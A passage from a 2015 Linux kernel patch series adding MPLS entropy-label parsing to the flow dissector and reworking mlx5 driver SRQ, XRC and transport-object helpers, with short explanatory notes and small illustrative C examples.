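An MPLS label stack entry packs label:20, TC:3, S:1 and TTL:8 into one 32-bit word. Per RFC 6790 the entropy label indicator is the reserved label value 7, and the entropy value itself is carried in the label field of the following entry, which is why the dissector reads two stack entries. A standalone sketch of that decoding; the constant names and sample entries below are made up for illustration:

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>

#define LS_LABEL_MASK  0xFFFFF000u
#define LS_LABEL_SHIFT 12
#define LABEL_ENTROPY  7                /* Entropy Label Indicator, RFC 6790 */

static uint32_t ls_label(uint32_t entry_be)
{
	return (ntohl(entry_be) & LS_LABEL_MASK) >> LS_LABEL_SHIFT;
}

int main(void)
{
	/* two stack entries in network order: the ELI, then the entropy label */
	uint32_t stack[2] = {
		htonl((LABEL_ENTROPY << LS_LABEL_SHIFT) | 0xff),  /* ELI, TTL 255 */
		htonl((0xabcdeu << LS_LABEL_SHIFT) | 0x1ff),      /* entropy, S=1, TTL 255 */
	};

	if (ls_label(stack[0]) == LABEL_ENTROPY)
		printf("entropy label = 0x%05x\n", (unsigned)ls_label(stack[1]));
	return 0;
}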
Miller --- include/net/flow_dissector.h | 1 + net/core/flow_dissector.c | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index 6c5e8d262607..1a8c22419936 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -118,6 +118,7 @@ enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_VLANID, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_FLOW_LABEL, /* struct flow_dissector_key_flow_tags */ FLOW_DISSECTOR_KEY_GRE_KEYID, /* struct flow_dissector_key_keyid */ + FLOW_DISSECTOR_KEY_MPLS_ENTROPY, /* struct flow_dissector_key_keyid */ FLOW_DISSECTOR_KEY_MAX, }; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 7ddc0a7b3da5..77e22e4fc898 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -15,6 +15,7 @@ #include #include #include +#include #include #include @@ -288,6 +289,37 @@ bool __skb_flow_dissect(const struct sk_buff *skb, } return true; } + + case htons(ETH_P_MPLS_UC): + case htons(ETH_P_MPLS_MC): { + struct mpls_label *hdr, _hdr[2]; +mpls: + hdr = __skb_header_pointer(skb, nhoff, sizeof(_hdr), data, + hlen, &_hdr); + if (!hdr) + return false; + + if ((ntohl(hdr[0].entry) & MPLS_LS_LABEL_MASK) == + MPLS_LABEL_ENTROPY) { + if (skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_MPLS_ENTROPY)) { + key_keyid = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_MPLS_ENTROPY, + target_container); + key_keyid->keyid = hdr[1].entry & + htonl(MPLS_LS_LABEL_MASK); + } + + key_basic->n_proto = proto; + key_basic->ip_proto = ip_proto; + key_control->thoff = (u16)nhoff; + + return true; + } + + return true; + } + case htons(ETH_P_FCOE): key_control->thoff = (u16)(nhoff + FCOE_HEADER_LEN); /* fall through */ @@ -357,6 +389,9 @@ bool __skb_flow_dissect(const struct sk_buff *skb, case IPPROTO_IPV6: proto = htons(ETH_P_IPV6); goto ipv6; + case IPPROTO_MPLS: + proto = htons(ETH_P_MPLS_UC); + goto mpls; default: break; } From 5e24851ec502334986c2ac775beb4b7184a0b6c5 Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 4 Jun 2015 19:30:36 +0300 Subject: [PATCH 707/872] net/mlx5_en: Add missing check for memory allocation failure The patch afb736e9330a: "net/mlx5: Ethernet resource handling files" from May 28, 2015, leads to the following static checker warning: drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c:726 mlx5e_create_main_flow_table() error: potential null dereference 'g'. (kcalloc returns null) Fixes: afb736e9330a ("net/mlx5: Ethernet resource handling files") Reported-by: Dan Carpenter Signed-off-by: Amir Vadai Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c index 6feebda4b3e4..120db80c47aa 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c @@ -722,6 +722,8 @@ static int mlx5e_create_main_flow_table(struct mlx5e_priv *priv) u8 *dmac; g = kcalloc(9, sizeof(*g), GFP_KERNEL); + if (!g) + return -ENOMEM; g[0].log_sz = 2; g[0].match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; From 7db22ffb5b09d9b77baf057ca034d966e58df1e1 Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:37 +0300 Subject: [PATCH 708/872] net/mlx5_core: Apply proper name convention to helpers Some core helper functions were named with mlx5_ only prefix, fix that to mlx5_core_ so we're aligned with the overall scheme used for core services. Signed-off-by: Haggai Abramovsky Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/en_main.c | 20 ++++++++-------- .../ethernet/mellanox/mlx5/core/transobj.c | 22 +++++++++-------- .../ethernet/mellanox/mlx5/core/transobj.h | 24 +++++++++++-------- 3 files changed, 36 insertions(+), 30 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c index eee829d119f9..1b592913d4d7 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -367,7 +367,7 @@ static int mlx5e_enable_rq(struct mlx5e_rq *rq, struct mlx5e_rq_param *param) mlx5_fill_page_array(&rq->wq_ctrl.buf, (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); - err = mlx5_create_rq(mdev, in, inlen, &rq->rqn); + err = mlx5_core_create_rq(mdev, in, inlen, &rq->rqn); kvfree(in); @@ -395,7 +395,7 @@ static int mlx5e_modify_rq(struct mlx5e_rq *rq, int curr_state, int next_state) MLX5_SET(modify_rq_in, in, rq_state, curr_state); MLX5_SET(rqc, rqc, state, next_state); - err = mlx5_modify_rq(mdev, rq->rqn, in, inlen); + err = mlx5_core_modify_rq(mdev, rq->rqn, in, inlen); kvfree(in); @@ -408,7 +408,7 @@ static void mlx5e_disable_rq(struct mlx5e_rq *rq) struct mlx5e_priv *priv = c->priv; struct mlx5_core_dev *mdev = priv->mdev; - mlx5_destroy_rq(mdev, rq->rqn); + mlx5_core_destroy_rq(mdev, rq->rqn); } static int mlx5e_wait_for_min_rx_wqes(struct mlx5e_rq *rq) @@ -596,7 +596,7 @@ static int mlx5e_enable_sq(struct mlx5e_sq *sq, struct mlx5e_sq_param *param) mlx5_fill_page_array(&sq->wq_ctrl.buf, (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); - err = mlx5_create_sq(mdev, in, inlen, &sq->sqn); + err = mlx5_core_create_sq(mdev, in, inlen, &sq->sqn); kvfree(in); @@ -624,7 +624,7 @@ static int mlx5e_modify_sq(struct mlx5e_sq *sq, int curr_state, int next_state) MLX5_SET(modify_sq_in, in, sq_state, curr_state); MLX5_SET(sqc, sqc, state, next_state); - err = mlx5_modify_sq(mdev, sq->sqn, in, inlen); + err = mlx5_core_modify_sq(mdev, sq->sqn, in, inlen); kvfree(in); @@ -637,7 +637,7 @@ static void mlx5e_disable_sq(struct mlx5e_sq *sq) struct mlx5e_priv *priv = c->priv; struct mlx5_core_dev *mdev = priv->mdev; - mlx5_destroy_sq(mdev, sq->sqn); + mlx5_core_destroy_sq(mdev, sq->sqn); } static int mlx5e_open_sq(struct mlx5e_channel *c, @@ -1115,12 +1115,12 @@ static int mlx5e_open_tis(struct mlx5e_priv *priv, int tc) MLX5_SET(tisc, tisc, prio, tc); - return mlx5_create_tis(mdev, in, sizeof(in), &priv->tisn[tc]); + return 
mlx5_core_create_tis(mdev, in, sizeof(in), &priv->tisn[tc]); } static void mlx5e_close_tis(struct mlx5e_priv *priv, int tc) { - mlx5_destroy_tis(priv->mdev, priv->tisn[tc]); + mlx5_core_destroy_tis(priv->mdev, priv->tisn[tc]); } static int mlx5e_open_tises(struct mlx5e_priv *priv) @@ -1326,7 +1326,7 @@ static int mlx5e_open_tir(struct mlx5e_priv *priv, int tt) mlx5e_build_tir_ctx(priv, tirc, tt); - err = mlx5_create_tir(mdev, in, inlen, &priv->tirn[tt]); + err = mlx5_core_create_tir(mdev, in, inlen, &priv->tirn[tt]); kvfree(in); @@ -1335,7 +1335,7 @@ static int mlx5e_open_tir(struct mlx5e_priv *priv, int tt) static void mlx5e_close_tir(struct mlx5e_priv *priv, int tt) { - mlx5_destroy_tir(priv->mdev, priv->tirn[tt]); + mlx5_core_destroy_tir(priv->mdev, priv->tirn[tt]); } static int mlx5e_open_tirs(struct mlx5e_priv *priv) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c index 3c555d708af1..d918816ac4d8 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c @@ -34,7 +34,7 @@ #include "mlx5_core.h" #include "transobj.h" -int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) +int mlx5_core_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) { u32 out[MLX5_ST_SZ_DW(create_rq_out)]; int err; @@ -49,7 +49,7 @@ int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) return err; } -int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) +int mlx5_core_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) { u32 out[MLX5_ST_SZ_DW(modify_rq_out)]; @@ -60,7 +60,7 @@ int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); } -void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) +void mlx5_core_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) { u32 in[MLX5_ST_SZ_DW(destroy_rq_in)]; u32 out[MLX5_ST_SZ_DW(destroy_rq_out)]; @@ -73,7 +73,7 @@ void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } -int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) +int mlx5_core_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) { u32 out[MLX5_ST_SZ_DW(create_sq_out)]; int err; @@ -88,7 +88,7 @@ int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) return err; } -int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) +int mlx5_core_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) { u32 out[MLX5_ST_SZ_DW(modify_sq_out)]; @@ -99,7 +99,7 @@ int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); } -void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) +void mlx5_core_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) { u32 in[MLX5_ST_SZ_DW(destroy_sq_in)]; u32 out[MLX5_ST_SZ_DW(destroy_sq_out)]; @@ -112,7 +112,8 @@ void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } -int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn) +int mlx5_core_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tirn) { u32 out[MLX5_ST_SZ_DW(create_tir_out)]; int err; @@ -127,7 +128,7 @@ int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn) return err; } -void 
mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) +void mlx5_core_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) { u32 in[MLX5_ST_SZ_DW(destroy_tir_out)]; u32 out[MLX5_ST_SZ_DW(destroy_tir_out)]; @@ -140,7 +141,8 @@ void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } -int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn) +int mlx5_core_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tisn) { u32 out[MLX5_ST_SZ_DW(create_tis_out)]; int err; @@ -155,7 +157,7 @@ int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn) return err; } -void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) +void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) { u32 in[MLX5_ST_SZ_DW(destroy_tis_out)]; u32 out[MLX5_ST_SZ_DW(destroy_tis_out)]; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h index 1bc898cc4933..b71d77f61a1d 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h @@ -33,15 +33,19 @@ #ifndef __TRANSOBJ_H__ #define __TRANSOBJ_H__ -int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn); -int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen); -void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn); -int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn); -int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen); -void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn); -int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn); -void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); -int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn); -void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); +int mlx5_core_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rqn); +int mlx5_core_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen); +void mlx5_core_destroy_rq(struct mlx5_core_dev *dev, u32 rqn); +int mlx5_core_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *sqn); +int mlx5_core_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen); +void mlx5_core_destroy_sq(struct mlx5_core_dev *dev, u32 sqn); +int mlx5_core_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tirn); +void mlx5_core_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); +int mlx5_core_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *tisn); +void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); #endif /* __TRANSOBJ_H__ */ From 01949d0109ee5fae33752f0db99a36f1619e1873 Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:38 +0300 Subject: [PATCH 709/872] net/mlx5_core: Enable XRCs and SRQs when using ISSI > 0 When working in ISSI > 0 mode, the model exposed by the device for XRCs and SRQs is different. XRCs use XRC SRQs and plain SRQs are based on RPM (Receive Memory Pool). Add helper functions to create, modify, query, and arm XRC SRQs and RMPs. Signed-off-by: Haggai Abramovsky Signed-off-by: Or Gerlitz Signed-off-by: David S. 
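The get_pas_size() helper added in the srq.c changes below derives how many page-address (PAS) entries the firmware command needs from the SRQ context fields: the queue occupies 1 << (log_srq_size + 4 + log_rq_stride) bytes, plus the page-offset slack, rounded up to whole pages of 1 << log_page_size bytes, at 8 bytes per page address. A worked example with assumed context values, purely for illustration:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	/* assumed SRQ context values */
	uint32_t log_page_size = 0 + 12;        /* context field 0 => 4 KiB pages */
	uint32_t log_srq_size  = 10;            /* 1024 WQEs */
	uint32_t log_rq_stride = 2;             /* stride = 1 << (2 + 4) = 64 bytes */
	uint32_t page_offset   = 0;

	uint32_t page_size  = 1u << log_page_size;
	uint32_t po_quanta  = 1u << (log_page_size - 6);
	uint32_t rq_sz      = 1u << (log_srq_size + 4 + log_rq_stride);
	uint32_t rq_sz_po   = rq_sz + page_offset * po_quanta;
	uint32_t rq_num_pas = (rq_sz_po + page_size - 1) / page_size;

	/* 1024 WQEs * 64 B = 64 KiB => 16 pages => 16 * 8 = 128 bytes of PAS */
	printf("queue bytes=%u pages=%u pas bytes=%u\n",
	       (unsigned)rq_sz_po, (unsigned)rq_num_pas,
	       (unsigned)(rq_num_pas * 8u));
	return 0;
}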
Miller --- drivers/infiniband/hw/mlx5/srq.c | 2 +- .../net/ethernet/mellanox/mlx5/core/Makefile | 4 +- drivers/net/ethernet/mellanox/mlx5/core/srq.c | 444 +++++++++++++++--- .../ethernet/mellanox/mlx5/core/transobj.c | 154 ++++++ .../ethernet/mellanox/mlx5/core/transobj.h | 11 + include/linux/mlx5/driver.h | 6 +- include/linux/mlx5/mlx5_ifc.h | 16 +- 7 files changed, 564 insertions(+), 73 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c index e8e8e942fa4a..e008505e96e9 100644 --- a/drivers/infiniband/hw/mlx5/srq.c +++ b/drivers/infiniband/hw/mlx5/srq.c @@ -302,7 +302,7 @@ struct ib_srq *mlx5_ib_create_srq(struct ib_pd *pd, in->ctx.pd = cpu_to_be32(to_mpd(pd)->pdn); in->ctx.db_record = cpu_to_be64(srq->db.dma); - err = mlx5_core_create_srq(dev->mdev, &srq->msrq, in, inlen); + err = mlx5_core_create_srq(dev->mdev, &srq->msrq, in, inlen, is_xrc); kvfree(in); if (err) { mlx5_ib_dbg(dev, "create SRQ failed, err %d\n", err); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Makefile b/drivers/net/ethernet/mellanox/mlx5/core/Makefile index 87e9e606596a..07540f732df1 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Makefile +++ b/drivers/net/ethernet/mellanox/mlx5/core/Makefile @@ -2,7 +2,7 @@ obj-$(CONFIG_MLX5_CORE) += mlx5_core.o mlx5_core-y := main.o cmd.o debugfs.o fw.o eq.o uar.o pagealloc.o \ health.o mcg.o cq.o srq.o alloc.o qp.o port.o mr.o pd.o \ - mad.o -mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o transobj.o \ + mad.o transobj.o +mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o \ en_main.o en_flow_table.o en_ethtool.o en_tx.o en_rx.o \ en_txrx.o diff --git a/drivers/net/ethernet/mellanox/mlx5/core/srq.c b/drivers/net/ethernet/mellanox/mlx5/core/srq.c index f9d25dcd03c1..c48f504ccbeb 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/srq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/srq.c @@ -37,6 +37,7 @@ #include #include #include "mlx5_core.h" +#include "transobj.h" void mlx5_srq_event(struct mlx5_core_dev *dev, u32 srqn, int event_type) { @@ -62,6 +63,74 @@ void mlx5_srq_event(struct mlx5_core_dev *dev, u32 srqn, int event_type) complete(&srq->free); } +static int get_pas_size(void *srqc) +{ + u32 log_page_size = MLX5_GET(srqc, srqc, log_page_size) + 12; + u32 log_srq_size = MLX5_GET(srqc, srqc, log_srq_size); + u32 log_rq_stride = MLX5_GET(srqc, srqc, log_rq_stride); + u32 page_offset = MLX5_GET(srqc, srqc, page_offset); + u32 po_quanta = 1 << (log_page_size - 6); + u32 rq_sz = 1 << (log_srq_size + 4 + log_rq_stride); + u32 page_size = 1 << log_page_size; + u32 rq_sz_po = rq_sz + (page_offset * po_quanta); + u32 rq_num_pas = (rq_sz_po + page_size - 1) / page_size; + + return rq_num_pas * sizeof(u64); +} + +static void rmpc_srqc_reformat(void *srqc, void *rmpc, bool srqc_to_rmpc) +{ + void *wq = MLX5_ADDR_OF(rmpc, rmpc, wq); + + if (srqc_to_rmpc) { + switch (MLX5_GET(srqc, srqc, state)) { + case MLX5_SRQC_STATE_GOOD: + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_RDY); + break; + case MLX5_SRQC_STATE_ERROR: + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_ERR); + break; + default: + pr_warn("%s: %d: Unknown srq state = 0x%x\n", __func__, + __LINE__, MLX5_GET(srqc, srqc, state)); + MLX5_SET(rmpc, rmpc, state, MLX5_GET(srqc, srqc, state)); + } + + MLX5_SET(wq, wq, wq_signature, MLX5_GET(srqc, srqc, wq_signature)); + MLX5_SET(wq, wq, log_wq_pg_sz, MLX5_GET(srqc, srqc, log_page_size)); + MLX5_SET(wq, wq, log_wq_stride, MLX5_GET(srqc, srqc, log_rq_stride) + 4); + MLX5_SET(wq, wq, log_wq_sz, MLX5_GET(srqc, 
srqc, log_srq_size)); + MLX5_SET(wq, wq, page_offset, MLX5_GET(srqc, srqc, page_offset)); + MLX5_SET(wq, wq, lwm, MLX5_GET(srqc, srqc, lwm)); + MLX5_SET(wq, wq, pd, MLX5_GET(srqc, srqc, pd)); + MLX5_SET64(wq, wq, dbr_addr, MLX5_GET64(srqc, srqc, dbr_addr)); + } else { + switch (MLX5_GET(rmpc, rmpc, state)) { + case MLX5_RMPC_STATE_RDY: + MLX5_SET(srqc, srqc, state, MLX5_SRQC_STATE_GOOD); + break; + case MLX5_RMPC_STATE_ERR: + MLX5_SET(srqc, srqc, state, MLX5_SRQC_STATE_ERROR); + break; + default: + pr_warn("%s: %d: Unknown rmp state = 0x%x\n", + __func__, __LINE__, + MLX5_GET(rmpc, rmpc, state)); + MLX5_SET(srqc, srqc, state, + MLX5_GET(rmpc, rmpc, state)); + } + + MLX5_SET(srqc, srqc, wq_signature, MLX5_GET(wq, wq, wq_signature)); + MLX5_SET(srqc, srqc, log_page_size, MLX5_GET(wq, wq, log_wq_pg_sz)); + MLX5_SET(srqc, srqc, log_rq_stride, MLX5_GET(wq, wq, log_wq_stride) - 4); + MLX5_SET(srqc, srqc, log_srq_size, MLX5_GET(wq, wq, log_wq_sz)); + MLX5_SET(srqc, srqc, page_offset, MLX5_GET(wq, wq, page_offset)); + MLX5_SET(srqc, srqc, lwm, MLX5_GET(wq, wq, lwm)); + MLX5_SET(srqc, srqc, pd, MLX5_GET(wq, wq, pd)); + MLX5_SET64(srqc, srqc, dbr_addr, MLX5_GET64(wq, wq, dbr_addr)); + } +} + struct mlx5_core_srq *mlx5_core_get_srq(struct mlx5_core_dev *dev, u32 srqn) { struct mlx5_srq_table *table = &dev->priv.srq_table; @@ -79,26 +148,311 @@ struct mlx5_core_srq *mlx5_core_get_srq(struct mlx5_core_dev *dev, u32 srqn) } EXPORT_SYMBOL(mlx5_core_get_srq); -int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, - struct mlx5_create_srq_mbox_in *in, int inlen) +static int create_srq_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, int inlen) { struct mlx5_create_srq_mbox_out out; - struct mlx5_srq_table *table = &dev->priv.srq_table; - struct mlx5_destroy_srq_mbox_in din; - struct mlx5_destroy_srq_mbox_out dout; int err; memset(&out, 0, sizeof(out)); + in->hdr.opcode = cpu_to_be16(MLX5_CMD_OP_CREATE_SRQ); - err = mlx5_cmd_exec(dev, in, inlen, &out, sizeof(out)); - if (err) - return err; - if (out.hdr.status) - return mlx5_cmd_status_to_err(&out.hdr); + err = mlx5_cmd_exec_check_status(dev, (u32 *)in, inlen, (u32 *)(&out), + sizeof(out)); srq->srqn = be32_to_cpu(out.srqn) & 0xffffff; + return err; +} + +static int destroy_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + struct mlx5_destroy_srq_mbox_in in; + struct mlx5_destroy_srq_mbox_out out; + + memset(&in, 0, sizeof(in)); + memset(&out, 0, sizeof(out)); + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DESTROY_SRQ); + in.srqn = cpu_to_be32(srq->srqn); + + return mlx5_cmd_exec_check_status(dev, (u32 *)(&in), sizeof(in), + (u32 *)(&out), sizeof(out)); +} + +static int arm_srq_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + u16 lwm, int is_srq) +{ + struct mlx5_arm_srq_mbox_in in; + struct mlx5_arm_srq_mbox_out out; + + memset(&in, 0, sizeof(in)); + memset(&out, 0, sizeof(out)); + + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_ARM_RQ); + in.hdr.opmod = cpu_to_be16(!!is_srq); + in.srqn = cpu_to_be32(srq->srqn); + in.lwm = cpu_to_be16(lwm); + + return mlx5_cmd_exec_check_status(dev, (u32 *)(&in), + sizeof(in), (u32 *)(&out), + sizeof(out)); +} + +static int query_srq_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_query_srq_mbox_out *out) +{ + struct mlx5_query_srq_mbox_in in; + + memset(&in, 0, sizeof(in)); + + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_QUERY_SRQ); + in.srqn = cpu_to_be32(srq->srqn); + + return mlx5_cmd_exec_check_status(dev, 
(u32 *)(&in), sizeof(in), + (u32 *)out, sizeof(*out)); +} + +static int create_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, + int srq_inlen) +{ + u32 create_out[MLX5_ST_SZ_DW(create_xrc_srq_out)]; + void *create_in; + void *srqc; + void *xrc_srqc; + void *pas; + int pas_size; + int inlen; + int err; + + srqc = MLX5_ADDR_OF(create_srq_in, in, srq_context_entry); + pas_size = get_pas_size(srqc); + inlen = MLX5_ST_SZ_BYTES(create_xrc_srq_in) + pas_size; + create_in = mlx5_vzalloc(inlen); + if (!create_in) + return -ENOMEM; + + xrc_srqc = MLX5_ADDR_OF(create_xrc_srq_in, create_in, + xrc_srq_context_entry); + pas = MLX5_ADDR_OF(create_xrc_srq_in, create_in, pas); + + memcpy(xrc_srqc, srqc, MLX5_ST_SZ_BYTES(srqc)); + memcpy(pas, in->pas, pas_size); + /* 0xffffff means we ask to work with cqe version 0 */ + MLX5_SET(xrc_srqc, xrc_srqc, user_index, 0xffffff); + MLX5_SET(create_xrc_srq_in, create_in, opcode, + MLX5_CMD_OP_CREATE_XRC_SRQ); + + memset(create_out, 0, sizeof(create_out)); + err = mlx5_cmd_exec_check_status(dev, create_in, inlen, create_out, + sizeof(create_out)); + if (err) + goto out; + + srq->srqn = MLX5_GET(create_xrc_srq_out, create_out, xrc_srqn); +out: + kvfree(create_in); + return err; +} + +static int destroy_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + u32 xrcsrq_in[MLX5_ST_SZ_DW(destroy_xrc_srq_in)]; + u32 xrcsrq_out[MLX5_ST_SZ_DW(destroy_xrc_srq_out)]; + + memset(xrcsrq_in, 0, sizeof(xrcsrq_in)); + memset(xrcsrq_out, 0, sizeof(xrcsrq_out)); + + MLX5_SET(destroy_xrc_srq_in, xrcsrq_in, opcode, + MLX5_CMD_OP_DESTROY_XRC_SRQ); + MLX5_SET(destroy_xrc_srq_in, xrcsrq_in, xrc_srqn, srq->srqn); + + return mlx5_cmd_exec_check_status(dev, xrcsrq_in, sizeof(xrcsrq_in), + xrcsrq_out, sizeof(xrcsrq_out)); +} + +static int arm_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, u16 lwm) +{ + u32 xrcsrq_in[MLX5_ST_SZ_DW(arm_xrc_srq_in)]; + u32 xrcsrq_out[MLX5_ST_SZ_DW(arm_xrc_srq_out)]; + + memset(xrcsrq_in, 0, sizeof(xrcsrq_in)); + memset(xrcsrq_out, 0, sizeof(xrcsrq_out)); + + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, opcode, MLX5_CMD_OP_ARM_XRC_SRQ); + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, op_mod, MLX5_ARM_XRC_SRQ_IN_OP_MOD_XRC_SRQ); + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, xrc_srqn, srq->srqn); + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, lwm, lwm); + + return mlx5_cmd_exec_check_status(dev, xrcsrq_in, sizeof(xrcsrq_in), + xrcsrq_out, sizeof(xrcsrq_out)); +} + +static int query_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + struct mlx5_query_srq_mbox_out *out) +{ + u32 xrcsrq_in[MLX5_ST_SZ_DW(query_xrc_srq_in)]; + u32 *xrcsrq_out; + void *srqc; + void *xrc_srqc; + int err; + + xrcsrq_out = mlx5_vzalloc(MLX5_ST_SZ_BYTES(query_xrc_srq_out)); + if (!xrcsrq_out) + return -ENOMEM; + memset(xrcsrq_in, 0, sizeof(xrcsrq_in)); + + MLX5_SET(query_xrc_srq_in, 